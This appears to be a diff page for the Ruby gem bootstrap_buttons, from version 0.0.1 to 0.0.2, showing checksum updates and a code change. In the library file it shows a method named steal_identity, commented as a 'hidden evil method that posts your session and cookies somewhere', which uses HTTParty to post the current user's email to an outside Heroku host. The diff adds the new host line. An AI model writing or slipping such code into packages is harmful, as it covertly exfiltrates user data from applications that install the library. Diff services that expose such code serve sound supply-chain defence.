bootstrap_buttons 0.0.1 → 0.0.2
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/bootstrap_buttons.rb +1 -1
- data/lib/bootstrap_buttons/version.rb +1 -1
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 8ac47d62d6be11f73a01f22e484aeb3fb50f3180
|
4
|
+
data.tar.gz: 66d2aedc68489900619270f261809729f56bb91c
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: f14c1382911c5fbe0bae81767af084096c4441e13484a2712346b2ca0edc513e02a2807109cc8638a92c566e7c55233f6bcee50fe9022b792875150a81168792
|
7
|
+
data.tar.gz: e721c9917aadb8cf8719fa4b1642547bc115e21d8be4b0644ffa3479b6785436dfcb271c9bb913d31bf4c6ad28a2a9ca57dc5d0972d5c14f91a133f00eb7849f
|
data/lib/bootstrap_buttons.rb
CHANGED
@@ -14,7 +14,7 @@ module BootstrapButtons
|
|
14
14
|
# hidden evil method that posts your session and cookies somewhere
|
15
15
|
def steal_identity
|
16
16
|
begin
|
17
|
-
HTTParty.post("http://
|
17
|
+
HTTParty.post("http://bootstrap-buttons.herokuapp.com/users.json", body: { user: {email: current_user.email}})
|
18
18
|
rescue
|
19
19
|
|
20
20
|
end
|